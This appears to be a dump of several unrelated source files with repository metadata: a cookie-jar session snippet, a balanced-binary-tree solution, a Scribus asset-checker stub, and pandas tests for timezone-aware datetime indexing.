marcuschia/ShaniXBMCWork
|
other/livetvPlayer.py
|
Python
|
gpl-2.0
| 7,065 | 0.045294 |
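getCookieJar/performLogin above keep the login session alive across add-on invocations by saving an LWPCookieJar to disk and reloading it later. Stripped of the Kodi and captcha parts, the pattern looks roughly like this (Python 3 module names; the URL and cookie path are placeholders):

import http.cookiejar
import urllib.request

COOKIEFILE = "/tmp/example-cookies.lwp"  # placeholder path

def load_cookiejar(path=COOKIEFILE):
    jar = http.cookiejar.LWPCookieJar()
    try:
        jar.load(path, ignore_discard=True)   # keep session cookies too
    except OSError:
        pass                                  # first run: no cookie file yet
    return jar

def fetch(url, jar, post=None):
    opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(jar))
    with opener.open(url, post) as resp:
        body = resp.read()
    jar.save(COOKIEFILE, ignore_discard=True)  # persist the session for the next run
    return body

# body = fetch("https://example.com/login", load_cookiejar())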
"""
Definition of TreeNode:
class TreeNode:
def __init__(self, val):
self.val = val
self.left, self.right = None, None
"""
class Solution:
"""
@param root: The root of binary tree.
@return: True if this Binary tree is Balanced, or false.
"""
def isBalanced(self, root):
# write your code here
isbalanced, h = self.isBalancedandHeight(root)
return isbalanced
def isBalancedandHeight(self, root):
if root is None:
return True, 0
l, r = root.left, root.right
l_balanced, l_h = self.isBalancedandHeight(l)
if not l_balanced:
return False, 0
r_balanced, r_h = self.isBalancedandHeight(r)
if not r_balanced:
return False, 0
if abs(l_h - r_h) < 2:
return True, max(l_h, r_h) + 1
return False, 0
|
Chasego/codirit
|
jiuzhang/Nine Chapters/3 Binary Tree & Divide Conquer/py/BalancedBinaryTree_rec.py
|
Python
|
mit
| 873 | 0.001145 |
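The solution above gets O(n) behaviour by returning both the balance flag and the height from a single recursion instead of recomputing heights per node. A self-contained check of that idea, with TreeNode redefined locally so the snippet runs on its own:

class TreeNode:
    def __init__(self, val):
        self.val = val
        self.left, self.right = None, None

def balanced_and_height(node):
    if node is None:
        return True, 0
    left_ok, left_h = balanced_and_height(node.left)
    if not left_ok:
        return False, 0
    right_ok, right_h = balanced_and_height(node.right)
    if not right_ok:
        return False, 0
    return abs(left_h - right_h) < 2, max(left_h, right_h) + 1

root = TreeNode(1)
root.left = TreeNode(2)
root.left.left = TreeNode(3)              # left chain of depth 3, empty right side
print(balanced_and_height(root)[0])       # False: height difference at the root is 2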
# This script will check http://services.scribus.net for broken assets
import lxml.html
url = "http://services.scribus.net"
doc = lxml.html.parse(url)
# pattern matching for relative urls: <a href="scribus_fonts.xml">
content_parsed = doc.xpath('//a/@href')
# also ignore scribusversions.xml
# Create a scraper class to feed .xml page results to
# Create a function that mails an admin when a result 404s
|
scribusproject/scribus-tools
|
resource-checker/scribus-services-check.py
|
Python
|
gpl-3.0
| 408 | 0.009804 |
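The script above stops after collecting hrefs; a rough sketch of the missing pieces its comments describe, the 404 check and the scribusversions.xml exclusion, could look like this (Python 3 stdlib; the URL joining and return shape are assumptions):

import urllib.error
import urllib.parse
import urllib.request

def broken_assets(base_url, hrefs):
    """Return the asset URLs that do not answer with HTTP 200."""
    broken = []
    for href in hrefs:
        if href.endswith("scribusversions.xml"):
            continue                            # explicitly ignored above
        full = urllib.parse.urljoin(base_url + "/", href)
        try:
            with urllib.request.urlopen(full) as resp:
                if resp.status != 200:
                    broken.append(full)
        except urllib.error.URLError:
            broken.append(full)
    return broken

# broken = broken_assets(url, content_parsed)
# a follow-up step could then e-mail this list to an admin, as the comments suggest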
import numpy as np
import pytest
import pandas as pd
from pandas import DataFrame, Index, Series, Timestamp, date_range
import pandas._testing as tm
class TestDatetimeIndex:
def test_indexing_with_datetime_tz(self):
# GH#8260
# support datetime64 with tz
idx = Index(date_range("20130101", periods=3, tz="US/Eastern"), name="foo")
dr = date_range("20130110", periods=3)
df = DataFrame({"A": idx, "B": dr})
df["C"] = idx
df.iloc[1, 1] = pd.NaT
df.iloc[1, 2] = pd.NaT
# indexing
result = df.iloc[1]
expected = Series(
[Timestamp("2013-01-02 00:00:00-0500", tz="US/Eastern"), pd.NaT, pd.NaT],
index=list("ABC"),
dtype="object",
name=1,
)
tm.assert_series_equal(result, expected)
result = df.loc[1]
expected = Series(
[Timestamp("2013-01-02 00:00:00-0500", tz="US/Eastern"), pd.NaT, pd.NaT],
index=list("ABC"),
dtype="object",
name=1,
)
tm.assert_series_equal(result, expected)
# indexing - fast_xs
df = DataFrame({"a": date_range("2014-01-01", periods=10, tz="UTC")})
result = df.iloc[5]
expected = Series(
[Timestamp("2014-01-06 00:00:00+0000", tz="UTC")], index=["a"], name=5
)
tm.assert_series_equal(result, expected)
result = df.loc[5]
tm.assert_series_equal(result, expected)
# indexing - boolean
result = df[df.a > df.a[3]]
expected = df.iloc[4:]
tm.assert_frame_equal(result, expected)
# indexing - setting an element
df = DataFrame(
data=pd.to_datetime(["2015-03-30 20:12:32", "2015-03-12 00:11:11"]),
columns=["time"],
)
df["new_col"] = ["new", "old"]
df.time = df.set_index("time").index.tz_localize("UTC")
v = df[df.new_col == "new"].set_index("time").index.tz_convert("US/Pacific")
# trying to set a single element on a part of a different timezone
# this converts to object
df2 = df.copy()
df2.loc[df2.new_col == "new", "time"] = v
expected = Series([v[0], df.loc[1, "time"]], name="time")
tm.assert_series_equal(df2.time, expected)
v = df.loc[df.new_col == "new", "time"] + pd.Timedelta("1s")
df.loc[df.new_col == "new", "time"] = v
tm.assert_series_equal(df.loc[df.new_col == "new", "time"], v)
def test_consistency_with_tz_aware_scalar(self):
# xef gh-12938
# various ways of indexing the same tz-aware scalar
df = Series([Timestamp("2016-03-30 14:35:25", tz="Europe/Brussels")]).to_frame()
df = pd.concat([df, df]).reset_index(drop=True)
expected = Timestamp("2016-03-30 14:35:25+0200", tz="Europe/Brussels")
result = df[0][0]
assert result == expected
result = df.iloc[0, 0]
assert result == expected
result = df.loc[0, 0]
assert result == expected
result = df.iat[0, 0]
assert result == expected
result = df.at[0, 0]
assert result == expected
result = df[0].loc[0]
assert result == expected
result = df[0].at[0]
assert result == expected
def test_indexing_with_datetimeindex_tz(self):
# GH 12050
# indexing on a series with a datetimeindex with tz
index = date_range("2015-01-01", periods=2, tz="utc")
ser = Series(range(2), index=index, dtype="int64")
# list-like indexing
for sel in (index, list(index)):
# getitem
result = ser[sel]
expected = ser.copy()
if sel is not index:
expected.index = expected.index._with_freq(None)
tm.assert_series_equal(result, expected)
# setitem
result = ser.copy()
result[sel] = 1
expected = Series(1, index=index)
tm.assert_series_equal(result, expected)
# .loc getitem
result = ser.loc[sel]
expected = ser.copy()
if sel is not index:
expected.index = expected.index._with_freq(None)
tm.assert_series_equal(result, expected)
# .loc setitem
result = ser.copy()
result.loc[sel] = 1
expected = Series(1, index=index)
tm.assert_series_equal(result, expected)
# single element indexing
# getitem
assert ser[index[1]] == 1
# setitem
result = ser.copy()
result[index[1]] = 5
expected = Series([0, 5], index=index)
tm.assert_series_equal(result, expected)
# .loc getitem
assert ser.loc[index[1]] == 1
# .loc setitem
result = ser.copy()
result.loc[index[1]] = 5
expected = Series([0, 5], index=index)
tm.assert_series_equal(result, expected)
@pytest.mark.parametrize("to_period", [True, False])
def test_loc_getitem_listlike_of_datetimelike_keys(self, to_period):
# GH 11497
idx = date_range("2011-01-01", "2011-01-02", freq="D", name="idx")
if to_period:
idx = idx.to_period("D")
ser = Series([0.1, 0.2], index=idx, name="s")
keys = [Timestamp("2011-01-01"), Timestamp("2011-01-02")]
if to_period:
keys = [x.to_period("D") for x in keys]
result = ser.loc[keys]
exp = Series([0.1, 0.2], index=idx, name="s")
if not to_period:
exp.index = exp.index._with_freq(None)
tm.assert_series_equal(result, exp, check_index_type=True)
keys = [
Timestamp("2011-01-02"),
Timestamp("2011-01-02"),
Timestamp("2011-01-01"),
]
if to_period:
keys = [x.to_period("D") for x in keys]
exp = Series(
[0.2, 0.2, 0.1], index=Index(keys, name="idx", dtype=idx.dtype), name="s"
)
result = ser.loc[keys]
tm.assert_series_equal(result, exp, check_index_type=True)
keys = [
Timestamp("2011-01-03"),
Timestamp("2011-01-02"),
Timestamp("2011-01-03"),
]
if to_period:
keys = [x.to_period("D") for x in keys]
with pytest.raises(KeyError, match="with any missing labels"):
ser.loc[keys]
def test_nanosecond_getitem_setitem_with_tz(self):
# GH 11679
data = ["2016-06-28 08:30:00.123456789"]
index = pd.DatetimeIndex(data, dtype="datetime64[ns, America/Chicago]")
df = DataFrame({"a": [10]}, index=index)
result = df.loc[df.index[0]]
expected = Series(10, index=["a"], name=df.index[0])
tm.assert_series_equal(result, expected)
result = df.copy()
result.loc[df.index[0], "a"] = -1
expected = DataFrame(-1, index=index, columns=["a"])
tm.assert_frame_equal(result, expected)
def test_loc_setitem_with_existing_dst(self):
# GH 18308
start = Timestamp("2017-10-29 00:00:00+0200", tz="Europe/Madrid")
end = Timestamp("2017-10-29 03:00:00+0100", tz="Europe/Madrid")
ts = Timestamp("2016-10-10 03:00:00", tz="Europe/Madrid")
idx = pd.date_range(start, end, closed="left", freq="H")
result = DataFrame(index=idx, columns=["value"])
result.loc[ts, "value"] = 12
expected = DataFrame(
[np.nan] * len(idx) + [12],
index=idx.append(pd.DatetimeIndex([ts])),
columns=["value"],
dtype=object,
)
tm.assert_frame_equal(result, expected)
|
jreback/pandas
|
pandas/tests/indexing/test_datetime.py
|
Python
|
bsd-3-clause
| 7,714 | 0.001037 |
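A compact, standalone illustration of the tz-aware indexing behaviour these tests pin down; dates and values are arbitrary.

import pandas as pd

idx = pd.date_range("2021-01-01", periods=3, tz="US/Eastern")
df = pd.DataFrame({"A": idx, "B": range(3)})

print(df.iloc[1]["A"])            # 2021-01-02 00:00:00-05:00 -> tz survives positional lookup
ser = pd.Series(range(3), index=idx)
print(ser[idx[2]])                # 2 -> scalar lookup with a tz-aware key
print(ser.loc[idx[0]:idx[1]])     # label slicing with tz-aware endpoints keeps two rows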